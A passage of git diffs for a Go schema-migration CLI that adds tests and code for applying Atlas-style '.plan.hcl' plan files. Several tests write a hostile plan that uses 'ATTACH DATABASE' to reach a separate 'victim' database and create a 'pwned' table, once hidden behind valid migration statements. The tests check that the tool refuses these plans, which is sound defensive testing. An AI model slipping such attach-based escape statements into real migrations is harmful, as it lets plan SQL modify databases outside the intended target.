+	victimPath := filepath.Join(dir, "victim.db")
+	planPath := filepath.Join(dir, "escape.plan.hcl")
+	seedSQLiteSchema(c, dbPath, oracleFromStateSchema)
+	seedSQLiteSchema(c, victimPath, `CREATE TABLE untouched (id INTEGER PRIMARY KEY);`)
+	writeAtlasPlanFile(c, planPath,
+		"ATTACH DATABASE '"+victimPath+"' AS victim;\nCREATE TABLE victim.pwned (id integer);")
+
+	out, err := runSchemaApplyPlan(atlas.NewCompatCommand("atlas"), "", dbPath, planPath,
+		"--to", "file://"+oracleFixturePath(c, oracleDesiredFile),
+		"--auto-approve",
+	)
+
+	// Refused by name, and nothing ran: not on the dev database, not on the
+	// target, and not on the third database the plan tried to reach.
+	c.Assert(err, qt.ErrorMatches,
+		`pre-planned migration cannot be verified on a dev database: statement 1 uses ATTACH, which attaches another SQLite database file.*`)
+	c.Assert(err, qt.ErrorMatches, `(?s).*Replaying it would not be a sandboxed rehearsal.*`)
+	c.Assert(out, qt.Contains, "cannot be verified on a dev database")
+	c.Assert(sqliteTableCount(c, victimPath, "pwned"), qt.Equals, 0)
+	c.Assert(sqliteTableCount(c, victimPath, "untouched"), qt.Equals, 1)
+	c.Assert(sqliteTableCount(c, dbPath, "posts"), qt.Equals, 0)
+	c.Assert(sqliteColumnCount(c, dbPath, "users", "email"), qt.Equals, 0)
+}
+
+// TestSchemaApplyAtlasPlanFileRefusesEscapeHiddenBehindValidChanges covers the
+// second probe from the review: the escape rides along with statements that do
+// converge to the desired state, so the end-state comparison would have passed
+// while the payload landed in an attached file.
+func TestSchemaApplyAtlasPlanFileRefusesEscapeHiddenBehindValidChanges(t *testing.T) {
+	c := qt.New(t)
+	dir := t.TempDir()
+	dbPath := filepath.Join(dir, "escape-hidden.db")
+	victimPath := filepath.Join(dir, "hidden-victim.db")
+	planPath := filepath.Join(dir, "hidden.plan.hcl")
+	seedSQLiteSchema(c, dbPath, oracleFromStateSchema)
+	seedSQLiteSchema(c, victimPath, `CREATE TABLE untouched (id INTEGER PRIMARY KEY);`)
+	oraclePlan, err := os.ReadFile(oracleFixturePath(c, oracleAtlasPlanFile))
+	c.Assert(err, qt.IsNil)
+	// The real oracle migration plus a trailing escape.
+	migration := strings.SplitN(string(oraclePlan), "migration = <<-SQL\n", 2)[1]
+	migration = strings.SplitN(migration, "\n  SQL\n", 2)[0]
+	migration = strings.ReplaceAll(migration, "\n  ", "\n")
+	migration = strings.TrimPrefix(migration, "  ")
+	writeAtlasPlanFile(c, planPath, migration+
+		"\nATTACH DATABASE '"+victimPath+"' AS victim;\nCREATE TABLE victim.pwned (id integer);")
+
+	_, err = runSchemaApplyPlan(atlas.NewCompatCommand("atlas"), "", dbPath, planPath,
+		"--to", "file://"+oracleFixturePath(c, oracleDesiredFile),
+		"--auto-approve",
+	)
+
+	c.Assert(err, qt.ErrorMatches, `pre-planned migration cannot be verified on a dev database: statement 4 uses ATTACH.*`)
+	c.Assert(sqliteTableCount(c, victimPath, "pwned"), qt.Equals, 0)
+	c.Assert(sqliteTableCount(c, dbPath, "posts"), qt.Equals, 0)
 }
 
 func TestSchemaApplyAtlasPlanFileDryRunPrintsWithoutApplying(t *testing.T) {

--- a/cmd/atlas/schema_apply_planhcl_test.go
+++ b/cmd/atlas/schema_apply_planhcl_test.go
@@ -1,0 +1,302 @@
+package atlas_test
+
+import (
+	"context"
+	"os"
+	"path/filepath"
+	"testing"
+
+	qt "github.com/frankban/quicktest"
+
+	"github.com/stokaro/ptah/cmd/atlas"
+	"github.com/stokaro/ptah/dbschema"
+	"github.com/stokaro/ptah/internal/atlasschema"
+)
+
+// The fixtures under testdata are the real measurement artifacts:
+// atlas.plan.hcl was written by the licensed Atlas binary
+// (v1.2.4-e282f76-canary) and atlas-plan-desired.sql is the desired state the
+// plan was computed for. The from-state DDL below recreates the scenario's
+// source database.
+const (
+	oracleAtlasPlanFile   = "testdata/atlas.plan.hcl"
+	oracleDesiredFile     = "testdata/atlas-plan-desired.sql"
+	oracleFromStateSchema = `CREATE TABLE users (id integer NOT NULL PRIMARY KEY AUTOINCREMENT, name text NOT NULL);`
+)
+
+// oracleFixturePath returns the absolute path of a testdata fixture so plan
+// and schema URLs stay valid regardless of the working directory.
+func oracleFixturePath(c *qt.C, name string) string {
+	c.Helper()
+	path, err := filepath.Abs(name)
+	c.Assert(err, qt.IsNil)
+	return path
+}
+
+func sqliteColumnCount(c *qt.C, dbPath, table, column string) int {
+	c.Helper()
+	conn, err := dbschema.ConnectToDatabase(context.Background(), "sqlite://"+dbPath)
+	c.Assert(err, qt.IsNil)
+	defer dbschema.CloseAndWarn(conn)
+	row := conn.QueryRowContext(
+		context.Background(),
+		`SELECT count(*) FROM pragma_table_info(?) WHERE name = ?`,
+		table, column,
+	)
+	var count int
+	c.Assert(row.Scan(&count), qt.IsNil)
+	return count
+}
+
+func sqliteIndexCount(c *qt.C, dbPath, index string) int {
+	c.Helper()
+	conn, err := dbschema.ConnectToDatabase(context.Background(), "sqlite://"+dbPath)
+	c.Assert(err, qt.IsNil)
+	defer dbschema.CloseAndWarn(conn)
+	row := conn.QueryRowContext(
+		context.Background(),
+		`SELECT count(*) FROM sqlite_master WHERE type = 'index' AND name = ?`,
+		index,
+	)
+	var count int
+	c.Assert(row.Scan(&count), qt.IsNil)
+	return count
+}
+
+func TestSchemaApplyAtlasOraclePlanFileAppliesAndVerifies(t *testing.T) {
+	c := qt.New(t)
+	dir := t.TempDir()
+	dbPath := filepath.Join(dir, "oracle.db")
+	seedSQLiteSchema(c, dbPath, oracleFromStateSchema)
+
+	out, err := runSchemaApplyPlan(atlas.NewCompatCommand("atlas"), "", dbPath,
+		oracleFixturePath(c, oracleAtlasPlanFile),
+		"--to", "file://"+oracleFixturePath(c, oracleDesiredFile),
+		"--auto-approve",
+	)
+
+	// The Atlas-authored plan executes end to end: the foreign hashes are
+	// re-verified by rehearsing the plan on an ephemeral SQLite dev database
+	// against --to, the plan's exact SQL applies, and the post-apply
+	// end-state verification passes.
+	c.Assert(err, qt.IsNil, qt.Commentf("%s", out))
+	c.Assert(out, qt.Contains, "Planned schema changes:")
+	c.Assert(out, qt.Contains, "ALTER TABLE `users` ADD COLUMN `email` text NULL")
+	c.Assert(out, qt.Contains, "Schema apply completed successfully.")
+	c.Assert(sqliteTableCount(c, dbPath, "posts"), qt.Equals, 1)
+	c.Assert(sqliteColumnCount(c, dbPath, "users", "email"), qt.Equals, 1)
+	c.Assert(sqliteIndexCount(c, dbPath, "idx_posts_user_id"), qt.Equals, 1)
+}
+
+func TestSchemaApplyAtlasPlanFileWithExplicitDevURL(t *testing.T) {
+	c := qt.New(t)
+	dir := t.TempDir()
+	dbPath := filepath.Join(dir, "oracle-dev.db")
+	seedSQLiteSchema(c, dbPath, oracleFromStateSchema)
+
+	// The exact invocation shape measured against the official binary:
+	// apply --url --to --dev-url --plan --auto-approve.
+	out, err := runSchemaApplyPlan(atlas.NewCompatCommand("atlas"), "", dbPath,
+		oracleFixturePath(c, oracleAtlasPlanFile),
+		"--to", "file://"+oracleFixturePath(c, oracleDesiredFile),
+		"--dev-url", "sqlite://"+filepath.Join(dir, "dev.db"),
+		"--auto-approve",
+	)
+
+	c.Assert(err, qt.IsNil, qt.Commentf("%s", out))
+	c.Assert(out, qt.Contains, "Schema apply completed successfully.")
+	c.Assert(sqliteTableCount(c, dbPath, "posts"), qt.Equals, 1)
+}
+
+func TestSchemaApplyAtlasPlanFileRequiresTo(t *testing.T) {
+	c := qt.New(t)
+	dir := t.TempDir()
+	dbPath := filepath.Join(dir, "oracle-noto.db")
+	seedSQLiteSchema(c, dbPath, oracleFromStateSchema)
+
+	_, err := runSchemaApplyPlan(atlas.NewCompatCommand("atlas"), "", dbPath,
+		oracleFixturePath(c, oracleAtlasPlanFile),
+		"--auto-approve",
+	)
+
+	// The official binary's contract and error, verbatim: an Atlas plan file
+	// carries nothing Ptah can verify without the desired state.
+	c.Assert(err, qt.ErrorMatches, `the flag "to" is required to verify the provided plan`)
+	c.Assert(sqliteTableCount(c, dbPath, "posts"), qt.Equals, 0)
+}
+
+func TestSchemaApplyAtlasPlanFileRefusesDriftedTarget(t *testing.T) {
+	c := qt.New(t)
+	dir := t.TempDir()
+	dbPath := filepath.Join(dir, "oracle-drift.db")
+	seedSQLiteSchema(c, dbPath, oracleFromStateSchema)
+	// The database drifts after the plan was computed.
+	seedSQLiteSchema(c, dbPath, `CREATE TABLE drifted (id INTEGER PRIMARY KEY);`)
+
+	out, err := runSchemaApplyPlan(atlas.NewCompatCommand("atlas"), "", dbPath,
+		oracleFixturePath(c, oracleAtlasPlanFile),
+		"--to", "file://"+oracleFixturePath(c, oracleDesiredFile),
+		"--auto-approve",
+	)
+
+	// Ptah cannot compare the plan's Atlas hashes, so the drift surfaces
+	// semantically: replaying the plan from the drifted schema does not
+	// reach --to, and the apply refuses with the target untouched.
+	c.Assert(err, qt.ErrorMatches, `(?s)pre-planned migration does not converge to the desired state:.*the target database was left unchanged.*re-run .schema plan. against the current database and review the fresh plan`)
+	c.Assert(atlasschema.IsPlanDesiredStateFailure(err), qt.IsTrue, qt.Commentf("%s", out))
+	c.Assert(sqliteTableCount(c, dbPath, "posts"), qt.Equals, 0)
+	c.Assert(sqliteTableCount(c, dbPath, "drifted"), qt.Equals, 1)
+}
+
+func TestSchemaApplyAtlasPlanFileRefusesTamperedDesiredState(t *testing.T) {
+	c := qt.New(t)
+	dir := t.TempDir()
+	dbPath := filepath.Join(dir, "oracle-tampered.db")
+	seedSQLiteSchema(c, dbPath, oracleFromStateSchema)
+	// The desired state no longer matches what the plan was computed for:
+	// a second --to source adds a table on top of the oracle desired state.
+	extraPath := filepath.Join(dir, "tampered-extra.sql")
+	c.Assert(os.WriteFile(extraPath, []byte(
+		"CREATE TABLE tampered_extra (id integer NOT NULL PRIMARY KEY AUTOINCREMENT);\n",
+	), 0o600), qt.IsNil)
+
+	_, err := runSchemaApplyPlan(atlas.NewCompatCommand("atlas"), "", dbPath,
+		oracleFixturePath(c, oracleAtlasPlanFile),
+		"--to", "file://"+oracleFixturePath(c, oracleDesiredFile),
+		"--to", "file://"+extraPath,
+		"--auto-approve",
+	)
+
+	// The rehearsed end state misses the tampered-in table, so the apply
+	// refuses before the target is touched.
+	c.Assert(err, qt.ErrorMatches, `(?s)pre-planned migration does not converge to the desired state:.*tampered_extra.*`)
+	c.Assert(sqliteTableCount(c, dbPath, "posts"), qt.Equals, 0)
+	c.Assert(sqliteTableCount(c, dbPath, "tampered_extra"), qt.Equals, 0)
+}
+
+func TestSchemaApplyAtlasPlanFileDryRunPrintsWithoutApplying(t *testing.T) {
+	c := qt.New(t)
+	dir := t.TempDir()
+	dbPath := filepath.Join(dir, "oracle-dry.db")
+	seedSQLiteSchema(c, dbPath, oracleFromStateSchema)
+
+	out, err := runSchemaApplyPlan(atlas.NewCompatCommand("atlas"), "", dbPath,
+		oracleFixturePath(c, oracleAtlasPlanFile),
+		"--to", "file://"+oracleFixturePath(c, oracleDesiredFile),
+		"--dry-run",
+	)
+
+	c.Assert(err, qt.IsNil, qt.Commentf("%s", out))
+	c.Assert(out, qt.Contains, "CREATE TABLE `posts`")
+	c.Assert(sqliteTableCount(c, dbPath, "posts"), qt.Equals, 0)
+}
+
+func TestSchemaApplyJSONPlanWithToVerifiesEndState(t *testing.T) {
+	c := qt.New(t)
+	dir := t.TempDir()
+	dbPath := filepath.Join(dir, "json-to.db")
+	seedSQLiteSchema(c, dbPath, `CREATE TABLE users (id INTEGER PRIMARY KEY);`)
+	desiredSQL := "CREATE TABLE users (id INTEGER PRIMARY KEY);\nCREATE TABLE json_orders (id INTEGER PRIMARY KEY);\n"
+	planPath := planFileFixture(c, dir, dbPath, desiredSQL)
+
+	// --plan now combines with --to on the JSON path too: the plan applies
+	// and the end state is verified against the desired schema.
+	out, err := runSchemaApplyPlan(atlas.NewCompatCommand("atlas"), "", dbPath, planPath,
+		"--to", "file://"+filepath.Join(dir, "desired.sql"),
+		"--auto-approve",
+	)
+
+	c.Assert(err, qt.IsNil, qt.Commentf("%s", out))
+	c.Assert(out, qt.Contains, "Schema apply completed successfully.")
+	c.Assert(sqliteTableCount(c, dbPath, "json_orders"), qt.Equals, 1)
+}
+
+func TestSchemaApplyJSONPlanWithMismatchedToFailsPostApply(t *testing.T) {
+	c := qt.New(t)
+	dir := t.TempDir()
+	dbPath := filepath.Join(dir, "json-mismatch.db")
+	seedSQLiteSchema(c, dbPath, `CREATE TABLE users (id INTEGER PRIMARY KEY);`)
+	planPath := planFileFixture(c, dir, dbPath,
+		"CREATE TABLE users (id INTEGER PRIMARY KEY);\nCREATE TABLE planned_only (id INTEGER PRIMARY KEY);\n")
+	otherDesiredPath := filepath.Join(dir, "other-desired.sql")
+	c.Assert(os.WriteFile(otherDesiredPath, []byte(
+		"CREATE TABLE users (id INTEGER PRIMARY KEY);\nCREATE TABLE somewhere_else (id INTEGER PRIMARY KEY);\n",
+	), 0o600), qt.IsNil)
+
+	out, err := runSchemaApplyPlan(atlas.NewCompatCommand("atlas"), "", dbPath, planPath,
+		"--to", "file://"+otherDesiredPath,
+		"--auto-approve",
+	)
+
+	// The fingerprint gate passes (the database matches the plan's source),
+	// the plan applies, and the always-on end-state verification then fails
+	// loudly: the reached state is not the --to desired state.
+	c.Assert(err, qt.ErrorMatches, `(?s)schema apply --plan end-state verification failed: after applying the plan, the database does not match the --to desired state.*`)
+	c.Assert(atlasschema.IsPlanDesiredStateFailure(err), qt.IsTrue, qt.Commentf("%s", out))
+	c.Assert(sqliteTableCount(c, dbPath, "planned_only"), qt.Equals, 1)
+}
+
+func TestSchemaApplyPtahWrittenHCLPlanRoundTrip(t *testing.T) {
+	c := qt.New(t)
+	dir := t.TempDir()
+	dbPath := filepath.Join(dir, "roundtrip.db")
+	schemaPath := filepath.Join(dir, "schema.sql")
+	planPath := filepath.Join(dir, "roundtrip.plan.hcl")
+	seedSQLiteSchema(c, dbPath, `CREATE TABLE users (id INTEGER PRIMARY KEY);`)
+	c.Assert(os.WriteFile(schemaPath, []byte(
+		"CREATE TABLE users (id INTEGER PRIMARY KEY);\nCREATE TABLE rt_orders (id INTEGER PRIMARY KEY);\n",
+	), 0o600), qt.IsNil)
+
+	planOut, err := runSchemaPlan(atlas.NewCompatCommand("atlas"),
+		"--from", "sqlite://"+dbPath,
+		"--to", "file://"+schemaPath,
+		"--output", planPath,
+	)
+	c.Assert(err, qt.IsNil, qt.Commentf("%s", planOut))
+
+	// The saved .plan.hcl carries Ptah's native sha256 fingerprints, so the
+	// apply verifies them AND rehearses the plan, then applies it.
+	plan, format, err := atlasschema.ReadPlanDocument(planPath)
+	c.Assert(err, qt.IsNil)
+	c.Assert(format, qt.Equals, atlasschema.PlanFormatHCL)
+	c.Assert(atlasschema.IsNativeFingerprint(plan.FromFingerprint), qt.IsTrue)
+
+	out, err := runSchemaApplyPlan(atlas.NewCompatCommand("atlas"), "", dbPath, planPath,
+		"--to", "file://"+schemaPath,
+		"--auto-approve",
+	)
+
+	c.Assert(err, qt.IsNil, qt.Commentf("%s", out))
+	c.Assert(out, qt.Contains, "Schema apply completed successfully.")
+	c.Assert(sqliteTableCount(c, dbPath, "rt_orders"), qt.Equals, 1)
+}
+
+func TestSchemaApplyPtahWrittenHCLPlanRefusesStaleTarget(t *testing.T) {
+	c := qt.New(t)
+	dir := t.TempDir()
+	dbPath := filepath.Join(dir, "roundtrip-stale.db")
+	schemaPath := filepath.Join(dir, "schema.sql")
+	planPath := filepath.Join(dir, "stale.plan.hcl")
+	seedSQLiteSchema(c, dbPath, `CREATE TABLE users (id INTEGER PRIMARY KEY);`)
+	c.Assert(os.WriteFile(schemaPath, []byte(
+		"CREATE TABLE users (id INTEGER PRIMARY KEY);\nCREATE TABLE stale_rt_orders (id INTEGER PRIMARY KEY);\n",
+	), 0o600), qt.IsNil)
+	planOut, err := runSchemaPlan(atlas.NewCompatCommand("atlas"),
+		"--from", "sqlite://"+dbPath,
+		"--to", "file://"+schemaPath,
+		"--output", planPath,
+	)
+	c.Assert(err, qt.IsNil, qt.Commentf("%s", planOut))
+	// The database drifts after the plan was computed.
+	seedSQLiteSchema(c, dbPath, `CREATE TABLE drifted (id INTEGER PRIMARY KEY);`)
+
+	_, err = runSchemaApplyPlan(atlas.NewCompatCommand("atlas"), "", dbPath, planPath,
+		"--to", "file://"+schemaPath,
+		"--auto-approve",
+	)
+
+	// A Ptah-written .plan.hcl keeps the native fingerprint contract: the
+	// drifted target refuses as stale before any rehearsal or execution.
+	c.Assert(err, qt.ErrorMatches, `pre-planned migration is stale: .*`)
+	c.Assert(sqliteTableCount(c, dbPath, "stale_rt_orders"), qt.Equals, 0)
+}

--- a/cmd/atlas/schema_apply_planhcl_test.go
+++ b/cmd/atlas/schema_apply_planhcl_test.go
@@ -215,9 +215,9 @@ func TestSchemaApplyAtlasPlanFileRefusesDevDatabaseEscape(t *testing.T) {
 	// Refused by name, and nothing ran: not on the dev database, not on the
 	// target, and not on the third database the plan tried to reach.
 	c.Assert(err, qt.ErrorMatches,
-		`pre-planned migration cannot be verified on a dev database: statement 1 uses ATTACH, which attaches another SQLite database file.*`)
-	c.Assert(err, qt.ErrorMatches, `(?s).*Replaying it would not stay inside the dev database.*`)
-	c.Assert(out, qt.Contains, "cannot be verified on a dev database")
+		`pre-planned migration was refused before it reached the dev database: statement 1 uses ATTACH, which attaches another SQLite database file.*`)
+	c.Assert(err, qt.ErrorMatches, `(?s).*A dev database executes plan SQL for real.*`)
+	c.Assert(out, qt.Contains, "refused before it reached the dev database")
 	c.Assert(sqliteTableCount(c, victimPath, "pwned"), qt.Equals, 0)
 	c.Assert(sqliteTableCount(c, victimPath, "untouched"), qt.Equals, 1)
 	c.Assert(sqliteTableCount(c, dbPath, "posts"), qt.Equals, 0)
@@ -251,7 +251,7 @@ func TestSchemaApplyAtlasPlanFileRefusesEscapeHiddenBehindValidChanges(t *testin
 		"--auto-approve",
 	)
 
-	c.Assert(err, qt.ErrorMatches, `pre-planned migration cannot be verified on a dev database: statement 4 uses ATTACH.*`)
+	c.Assert(err, qt.ErrorMatches, `pre-planned migration was refused before it reached the dev database: statement 4 uses ATTACH.*`)
 	c.Assert(sqliteTableCount(c, victimPath, "pwned"), qt.Equals, 0)
 	c.Assert(sqliteTableCount(c, dbPath, "posts"), qt.Equals, 0)
 }
@@ -295,7 +295,7 @@ func TestSchemaApplyAtlasPlanFileDryRunRefusesDevDatabaseEscape(t *testing.T) {
 	)
 
 	c.Assert(err, qt.ErrorMatches,
-		`pre-planned migration cannot be verified on a dev database: statement 1 uses ATTACH.*`)
+		`pre-planned migration was refused before it reached the dev database: statement 1 uses ATTACH.*`)
 	c.Assert(sqliteTableCount(c, victimPath, "pwned"), qt.Equals, 0)
 	c.Assert(sqliteTableCount(c, victimPath, "untouched"), qt.Equals, 1)
 }

--- a/cmd/atlas/schema_apply_planhcl_test.go
+++ b/cmd/atlas/schema_apply_planhcl_test.go
@@ -216,7 +216,7 @@ func TestSchemaApplyAtlasPlanFileRefusesDevDatabaseEscape(t *testing.T) {
 	// target, and not on the third database the plan tried to reach.
 	c.Assert(err, qt.ErrorMatches,
 		`pre-planned migration cannot be verified on a dev database: statement 1 uses ATTACH, which attaches another SQLite database file.*`)
-	c.Assert(err, qt.ErrorMatches, `(?s).*Replaying it would not be a sandboxed rehearsal.*`)
+	c.Assert(err, qt.ErrorMatches, `(?s).*Replaying it would not stay inside the dev database.*`)
 	c.Assert(out, qt.Contains, "cannot be verified on a dev database")
 	c.Assert(sqliteTableCount(c, victimPath, "pwned"), qt.Equals, 0)
 	c.Assert(sqliteTableCount(c, victimPath, "untouched"), qt.Equals, 1)
@@ -270,6 +270,57 @@ func TestSchemaApplyAtlasPlanFileDryRunPrintsWithoutApplying(t *testing.T) {
 
 	c.Assert(err, qt.IsNil, qt.Commentf("%s", out))
 	c.Assert(out, qt.Contains, "CREATE TABLE `posts`")
+	c.Assert(sqliteTableCount(c, dbPath, "posts"), qt.Equals, 0)
+}
+
+// TestSchemaApplyAtlasPlanFileDryRunRefusesDevDatabaseEscape pins that
+// --dry-run performs the verification rather than printing and returning.
+// Without it, restoring an early `if opts.dryRun { return nil }` in front of
+// the rehearsal would leave the whole suite green while a dry run silently
+// stopped checking anything. This case exits through the escape guard.
+func TestSchemaApplyAtlasPlanFileDryRunRefusesDevDatabaseEscape(t *testing.T) {
+	c := qt.New(t)
+	dir := t.TempDir()
+	dbPath := filepath.Join(dir, "dryrun-escape.db")
+	victimPath := filepath.Join(dir, "dryrun-victim.db")
+	planPath := filepath.Join(dir, "dryrun-escape.plan.hcl")
+	seedSQLiteSchema(c, dbPath, oracleFromStateSchema)
+	seedSQLiteSchema(c, victimPath, `CREATE TABLE untouched (id INTEGER PRIMARY KEY);`)
+	writeAtlasPlanFile(c, planPath,
+		"ATTACH DATABASE '"+victimPath+"' AS victim;\nCREATE TABLE victim.pwned (id integer);")
+
+	_, err := runSchemaApplyPlan(atlas.NewCompatCommand("atlas"), "", dbPath, planPath,
+		"--to", "file://"+oracleFixturePath(c, oracleDesiredFile),
+		"--dry-run",
+	)
+
+	c.Assert(err, qt.ErrorMatches,
+		`pre-planned migration cannot be verified on a dev database: statement 1 uses ATTACH.*`)
+	c.Assert(sqliteTableCount(c, victimPath, "pwned"), qt.Equals, 0)
+	c.Assert(sqliteTableCount(c, victimPath, "untouched"), qt.Equals, 1)
+}
+
+// TestSchemaApplyAtlasPlanFileDryRunRefusesNonConvergingPlan is the second
+// half of the same pin, exiting through the desired-state comparison instead
+// of the escape guard: a dry run must report that the plan does not reach the
+// --to state, which is the whole point of test-driving a foreign plan.
+func TestSchemaApplyAtlasPlanFileDryRunRefusesNonConvergingPlan(t *testing.T) {
+	c := qt.New(t)
+	dir := t.TempDir()
+	dbPath := filepath.Join(dir, "dryrun-nonconverging.db")
+	planPath := filepath.Join(dir, "dryrun-nonconverging.plan.hcl")
+	seedSQLiteSchema(c, dbPath, oracleFromStateSchema)
+	writeAtlasPlanFile(c, planPath, "CREATE TABLE unrelated (id integer NOT NULL PRIMARY KEY);")
+
+	out, err := runSchemaApplyPlan(atlas.NewCompatCommand("atlas"), "", dbPath, planPath,
+		"--to", "file://"+oracleFixturePath(c, oracleDesiredFile),
+		"--dry-run",
+	)
+
+	c.Assert(err, qt.ErrorMatches, `(?s)pre-planned migration does not converge to the desired state.*`)
+	c.Assert(atlasschema.IsPlanDesiredStateFailure(err), qt.IsTrue, qt.Commentf("%s", out))
+	// A dry run still applies nothing to the target.
+	c.Assert(sqliteTableCount(c, dbPath, "unrelated"), qt.Equals, 0)
 	c.Assert(sqliteTableCount(c, dbPath, "posts"), qt.Equals, 0)
 }
 

--- a/cmd/atlas/schema_plan.go
+++ b/cmd/atlas/schema_plan.go
@@ -1,7 +1,9 @@
 package atlas
 
 import (
+	"errors"
 	"fmt"
+	"io/fs"
 	"os"
 	"strings"
 	"time"
@@ -191,6 +193,15 @@ func runAtlasSchemaPlan(cmd *cobra.Command, opts atlasSchemaPlanOptions) error {
 	path := outputPath
 	if path == "" {
 		path = plan.Name + atlasschema.PlanFileSuffixFor(format)
+		// Default plan names are timestamps with one-second granularity, so
+		// two plans computed in the same second would silently overwrite each
+		// other's reviewed SQL. An explicit --output path stays overwritable.
+		if _, err := os.Stat(path); err == nil {
+			return cmdutil.Fail(cmd, fmt.Errorf(
+				"plan file %s already exists; pass --name or --output to choose a distinct plan file", path))
+		} else if !errors.Is(err, fs.ErrNotExist) {
+			return cmdutil.Fail(cmd, fmt.Errorf("check plan file %s: %w", path, err))
+		}
 	}
 	if err := os.WriteFile(path, document, 0o644); err != nil { //nolint:gosec // plan files are meant to be reviewed and shared, 0644 like migration files
 		return cmdutil.Fail(cmd, fmt.Errorf("write plan file: %w", err))

--- a/cmd/atlas/schema_plan.go
+++ b/cmd/atlas/schema_plan.go
@@ -4,6 +4,7 @@ import (
 	"fmt"
 	"os"
 	"strings"
+	"time"
 
 	"github.com/spf13/cobra"
 
@@ -35,16 +36,24 @@ func newAtlasSchemaPlanCommand() *cobra.Command {
 
 Atlas gates schema plan behind the Atlas Pro registry approval flow. Ptah
 implements the open local replacement: the plan is computed from the --from
-target database to the local --to schema files and saved as a fingerprinted
-local plan file (JSON, format version 1).
+target database to the local --to schema files and saved as a local plan
+file. The default format is the Atlas ` + "`.plan.hcl`" + ` shape (one plan block with
+from/to fingerprints and the migration SQL), so the saved file is readable by
+Atlas's own plan reader; an --output path ending in .json writes Ptah's
+native fingerprinted JSON plan (format version 1) instead. The from/to
+values in a ` + "`.plan.hcl`" + ` are Ptah's sha256 fingerprints — the official Atlas
+binary parses the file but verifies its own hashes, which have no local
+recipe.
 ` + "`atlas schema apply --plan file://<path>`" + ` executes the saved plan after
-verifying the database still matches the plan's source fingerprint, so a
-reviewed plan is exactly what runs. Pass --save or --output <path> to write
-the plan file, or --dry-run to print the plan document without saving it.
-When --env is set, the selected atlas.hcl env can provide url (the --from
+verifying it against the live database, so a reviewed plan is exactly what
+runs. Pass --save or --output <path> to write the plan file; without either,
+the plan document prints to stdout (--dry-run does the same explicitly).
+--auto-approve is accepted for Atlas CLI compatibility: a locally saved plan
+file is approved by operator review, so there is no prompt to skip. When
+--env is set, the selected atlas.hcl env can provide url (the --from
 target), schema.src, dev, exclude, schema.mode, and supported diff policy
-values. Registry-bound planning (--push, --pending, --repo, plan approval)
-and the plan registry sub-verbs remain Atlas CE boundary stubs.`,
+values. Registry-bound planning (--push, --pending, --repo) and the plan
+registry sub-verbs remain Atlas CE boundary stubs.`,
 		RunE: func(cmd *cobra.Command, _ []string) error {
 			return runAtlasSchemaPlan(cmd, opts)
 		},
@@ -56,13 +65,15 @@ and the plan registry sub-verbs remain Atlas CE boundary stubs.`,
 	flags.StringArrayVar(&opts.exclude, "exclude", nil, "Schema objects to exclude from planning")
 	registerAtlasSchemaFlag(flags, &opts.schemas, "Schemas to plan when database URLs are used")
 	flags.StringVar(&opts.name, "name", "", "Plan name recorded in the plan file")
-	flags.StringVarP(&opts.output, "output", "o", "", "Plan file output path (default <name>"+atlasschema.PlanFileSuffix+")")
+	flags.StringVarP(&opts.output, "output", "o", "", "Plan file output path (default <name>"+atlasschema.PlanFileSuffixHCL+"; a .json path writes the native JSON plan format)")
 	flags.BoolVar(&opts.save, "save", false, "Save the plan to a local plan file")
 	flags.BoolVar(&opts.dryRun, "dry-run", false, "Print the plan file document without saving it")
+	// Accepted for Atlas CLI compatibility: a locally saved plan file is
+	// approved by operator review, so there is no approval prompt to skip.
+	flags.Bool("auto-approve", false, "Approve the plan without asking for confirmation")
 	// The remaining Atlas Pro plan flags are declared for CLI-surface parity
 	// and rejected loudly in validateAtlasSchemaPlanOptions: their behavior is
 	// either bound to the Atlas Registry or not implemented yet.
-	flags.Bool("auto-approve", false, "Approve the plan without asking for confirmation")
 	flags.Bool("push", false, "Push the plan to the Atlas Registry")
 	flags.Bool("pending", false, "Push the plan in a pending state")
 	flags.String("repo", "", "URL to the schema repository")
@@ -156,11 +167,20 @@ func runAtlasSchemaPlan(cmd *cobra.Command, opts atlasSchemaPlanOptions) error {
 		fmt.Fprintln(cmd.OutOrStdout(), "Schema is synced, no changes to be made.")
 		return nil
 	}
-	document, err := atlasschema.MarshalPlanFile(plan)
+	outputPath := strings.TrimSpace(opts.output)
+	format := atlasSchemaPlanFormat(outputPath)
+	// The Atlas plan format names plans with a UTC timestamp; keep the
+	// deterministic fingerprint-derived default for the native JSON format.
+	if format == atlasschema.PlanFormatHCL && strings.TrimSpace(opts.name) == "" {
+		plan.Name = atlasschema.TimestampPlanName(time.Now())
+	}
+	document, err := atlasschema.MarshalPlanFileAs(plan, format)
 	if err != nil {
 		return cmdutil.Fail(cmd, err)
 	}
-	if opts.dryRun {
+	// Without a save destination the plan document prints to stdout, like
+	// Atlas printing the computed plan; --dry-run does the same explicitly.
+	if opts.dryRun || (!opts.save && outputPath == "") {
 		if _, err := cmd.OutOrStdout().Write(document); err != nil {
 			return cmdutil.Fail(cmd, fmt.Errorf("write plan preview: %w", err))
 		}
@@ -168,15 +188,25 @@ func runAtlasSchemaPlan(cmd *cobra.Command, opts atlasSchemaPlanOptions) error {
 	}
 
 	printAtlasSchemaApplyPlan(cmd.OutOrStdout(), plan.SQL())
-	path := strings.TrimSpace(opts.output)
+	path := outputPath
 	if path == "" {
-		path = plan.Name + atlasschema.PlanFileSuffix
+		path = plan.Name + atlasschema.PlanFileSuffixFor(format)
 	}
 	if err := os.WriteFile(path, document, 0o644); err != nil { //nolint:gosec // plan files are meant to be reviewed and shared, 0644 like migration files
 		return cmdutil.Fail(cmd, fmt.Errorf("write plan file: %w", err))
 	}
 	fmt.Fprintf(cmd.OutOrStdout(), "Plan saved to file://%s\n", path)
 	return nil
+}
+
+// atlasSchemaPlanFormat selects the plan-file encoding from the output path:
+// the Atlas-compatible tree defaults to the Atlas `.plan.hcl` format, and an
+// explicit .json output path keeps the native JSON plan format reachable.
+func atlasSchemaPlanFormat(outputPath string) atlasschema.PlanFormat {
+	if strings.HasSuffix(strings.ToLower(outputPath), ".json") {
+		return atlasschema.PlanFormatJSON
+	}
+	return atlasschema.PlanFormatHCL
 }
 
 func needsAtlasSchemaPlanConfig(cmd *cobra.Command) bool {
@@ -201,10 +231,6 @@ func validateAtlasSchemaPlanOptions(cmd *cobra.Command, opts atlasSchemaPlanOpti
 	}
 	if err := ensureLocalSchemaURLs("--to", opts.toURLs); err != nil {
 		return err
-	}
-	if !opts.save && strings.TrimSpace(opts.output) == "" && !opts.dryRun {
-		return fmt.Errorf("atlas schema plan pushes unsaved plans to the Atlas Registry, which Ptah does not use; " +
